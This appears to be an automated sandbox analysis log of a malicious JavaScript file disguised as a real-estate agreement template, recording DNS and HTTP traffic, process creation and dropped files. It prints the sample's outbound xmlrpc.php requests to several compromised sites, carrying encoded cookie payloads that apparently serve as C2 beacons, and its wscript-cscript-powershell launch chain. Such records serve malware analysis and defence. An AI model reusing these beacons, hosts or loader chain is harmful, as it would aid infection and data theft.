1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNYQpurJIAjB/n2EzrYImkUj5IZneMZD4CmW+4V58Z9fVcXn411+hhHHO+auDwx54gYcjWvHFkMTc8XXLV7r8VvmpvoFPCS6HYABAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: tennoji-law-uranai.comConnection: Close
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g+sY1qlsVaFrs8IDI2axK4daJHy8TNkUx5yke8udy6InO3aaDF8cOvhEyUm02G4ZiAdW9oAi+gVB48hmb6VzOydy8z+4ZOBJzlk4GQGDLHnOc/2vYNknLSrRQUeeXnZoScGEbvaVXgW3Knygnxb5YdhsB3sNNqtwdOkFMIHsFzBuWROMFqJvCiaQrQe3hg3WQ0td9eCKBkBntVCP6xH9v8EsTmR+JajdgMI62PNJYToZFZ+1FkFYSqfBGwhdH9bkbnL6nqRCFq3gWfcB5pinp+JFv/1XZbUHO78M4x2vFst/rBBT9yAw3EtfLGhjtr3dct6qfbFe3FU4O2R57pUal78L2idKCefAQAA; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: naturalanimals.netConnection: Close
    Source: global trafficHTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W7CMAz8leUH9g8MdRrSGBOF8Vy1brFIYmOnhUr5+LnNpjzkIt+d77Jh9tg2CSm+SxPggzRl11K8FqCtIK9AVO1KfaCYXddoYXbeF2b3CNnBkz0JSHY9xdTJVGa7zkN2XpvFYg+BZH7ZUmABVVzs9nRW2pryQnJb5Ie+xxa2Fu12ouNoFKYHiF7B++yOMKAmmQ2NMWGAN6FVVkMj7XXDnJ2CTGZhC+tBwj9BsSTS0EiybgBxeSy5lIm8TsZPNttDHKsngyDE9u9XdGqLup41gdU9wTPtIo+pzM/Mc/j8qio+He7y0w843NGKPzDaSSvwNCyFLxjrZH1f16yXgN8y1dUv9/VpJo0BAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: weissenbach-pr.deConnection: Close
    Source: global trafficHTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W7CMAz8leUH9g8MdRrSGBOF8Vy1brFIYmOnhUr5+LnNpjzkIt+d77Jh9tg2CSm+SxPggzRl11K8FqCtIK9AVO1KfaCYXddoYXbeF2b3CNnBkz0JSHY9xdTJVGa7zkN2XpvFYg+BZH7ZUmABVVzs9nRW2pryQnJb5Ie+xxa2Fu12ouNoFKYHiF7B++yOMKAmmQ2NMWGAN6FVVkMj7XXDnJ2CTGZhC+tBwj9BsSTS0EiybgBxeSy5lIm8TsZPNttDHKsngyDE9u9XdGqLup41gdU9wTPtIo+pzM/Mc/j8qio+He7y0w843NGKPzDaSSvwNCyFLxjrZH1f16yXgN8y1dUv9/VpJo0BAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: memar98.comConnection: Close
    Source: global trafficHTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNYQpurJIAjB/n2EzrYImkUj5IZneMZD4CmW+4V58Z9fVcXn411+hhHHO+auDwx54gYcjWvHFkMTc8XXLV7r8VvmpvoFPCS6HYABAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: tennoji-law-uranai.comConnection: Close
    Source: global trafficHTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNYQpurJIAjB/n2EzrYImkUj5IZneMZD4CmW+4V58Z9fVcXn411+hhHHO+auDwx54gYcjWvHFkMTc8XXLV7r8VvmpvoFPCS6HYABAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: tennoji-law-uranai.comConnection: Close
    Source: global trafficDNS traffic detected: DNS query: naturalanimals.net
    Source: global trafficDNS traffic detected: DNS query: weissenbach-pr.de
    Source: global trafficDNS traffic detected: DNS query: memar98.com
    Source: global trafficDNS traffic detected: DNS query: tennoji-law-uranai.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 06 May 2024 16:41:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 199Connection: closeVary: Accept-Encoding
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: http://my.opera.com/emoller/blog/2011/12/20/requestanimationframe-for-smart-er-animating
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: http://paulirish.com/2011/requestanimationframe-for-smart-animating/
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: http://peltiertech.com/how-excel-calculates-automatic-chart-axis-limits/
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: http://raphaeljs.com/analytics.js)
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: http://stackoverflow.com/questions/1573053/javascript-function-to-convert-color-names-to-hex-codes
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: http://www.cs.rit.edu/~ncs/color/t_convert.html
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: http://www.w3schools.com/HTML/html_colornames.asp
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: http://www.w3schools.com/svg/svg_path.asp
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/d
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: https://github.com/miguelmota/base64toblob/blob/master/base64toblob.js
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: https://github.com/nhn/tui.chart
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: https://github.com/nhn/tui.chart/issues/56)
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: https://i-msdn.sec.s-msft.com/dynimg/IC267997.gif
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: https://www.google-analytics.com/collect
    Source: real estate co ownership agreement template 43632.jsString found in binary or memory: https://www.win.tue.nl/~vanwijk/stm.pdf
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownHTTPS traffic detected: 91.198.66.211:443 -> 192.168.2.7:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 78.46.3.78:443 -> 192.168.2.7:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 195.28.10.122:443 -> 192.168.2.7:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 153.127.91.146:443 -> 192.168.2.7:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 153.127.91.146:443 -> 192.168.2.7:49711 version: TLS 1.2

    System Summary

    barindex
    Windows Scripting host queries suspicious COM object (likely to drop second stage)
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 49%
    Source: real estate co ownership agreement template 43632.jsInitial sample: Strings found which are bigger than 50
    Source: classification engineClassification label: mal92.troj.expl.evad.winJS@13/9@4/4
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\com.adobe.dunamis\Golf Club Repair.datJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fffj2uvs.1yt.ps1Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE DEVELO~1.JS
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
    Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE DEVELO~1.JS
    Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
    Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"Jump to behavior
    Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
